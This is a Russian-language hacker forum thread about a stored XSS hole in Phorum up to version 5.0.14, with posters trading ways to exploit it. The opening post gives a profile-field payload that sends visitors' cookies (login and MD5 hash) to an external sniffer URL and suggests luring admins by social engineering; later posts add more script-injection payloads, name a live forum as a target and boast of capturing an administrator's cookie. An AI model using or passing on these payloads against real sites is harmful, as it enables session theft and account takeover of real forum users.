XSS в Phorum<=5.0.14

CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:

Code:

Вовочка<script>alert(document.cookie)</script>

Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно
Теперь как можно употребить на других,
В поле Real Nаme вставим:

Code:

Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>

Или че то подобное, где URL это адрес снифера.
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.
Теперь, подделка куков, жаль не сработала, вчера пыхтел любыми путями, не получилось Может у кого другого получитса, дай знать. Братец KEZ от снеми видео, еси такое дело с куками провернётса
Просто этот форум времмено содержит куки, которые через некоторое время уничтажаютса, что требует повторной авторизации.

 

Ну давай ссылку что нам гадать в чём проблема чтоли?

 

Хотя если честно, то Я проблему знаю. Мне просто ссылка нужна. Ссылку давай короче.

 

Я эту фишку уже как 2 недели назад просек.

Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=)

Да, с подделкой действительно траблы, так что тут приходится все рассшифровывать.

 

Если никто не против, на днях сделаю видео.

 

Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.

 

Ну возьми этот к примеру: http://www.recipe.ru/forum/

 

Вроде в поле "подписи" эту уязвимость я не заметил,
ты о чем??

а кто против?, античату да и всем наоборот лучше

 

Ну и форум... Что это за форум на котором можно ставить <script>

 

бывает..

эх, был бы выход куки подделать..

 

Извиняюсь, немного провтыкал. А штука там такя, проверки в подписи нет только когда смотришь профайл, при посте же, вводится проверка на <>, так что внедрение скрипта в подпись в данном случае не прокатит.
Беру свои слова назад, без просмотра жертвой профайла ничего не выйдет.

Кстати, в phorume присутствуют bb теги, эт. так, для размышлений.....
А насчет видео, в принципе всё и так понятно, но если есть потребность......будет и предложение.

 

Прикинь, доснял видео, заархивировал, думаю загляну ещё раз в лог сниффа, а уменя там админ уже сидит, гы-гы, даже никакой СИ не понадобилось, просто пиши в строке подписи FUCKING USA!!! и все.
Вобщем сплошной ЛОЛ.

 

В этом форуме есть ещё уязвимости xss

 

Давеча ковырялся в старенькой версии phorum, несмотря на старость её можно найти на просторах инета оч. легко, и наткнулся на такой баг. При анонимном ответе, в поле Your E-mail: вставляю

Code:

 gates@microsoft.com"><script>alert('')</script>

и пока кто-нить после меня не оставит сообщение, все ловят алерт.=)

p.s. KEZ, где ты ещё нашел, не в bb ль тегах?

 

Короче просто дайте мне ссылку на форум Я там хочу баги найти.

 

Morph"><script>alert('Morph Forever')</script> это еще в поле ник проходит =)
Тока я зайти не могу еще чтонить поищем ))

 

А я письмо не получил ))

 

Все работает всем алерты раздал зашибись ))
Дыра Большая одна одним словом

 

Млрф дай ссылку где ты это зделал.

 

в поисковике найди я так нашел и не запоминал
И Я не Млрф!!!!!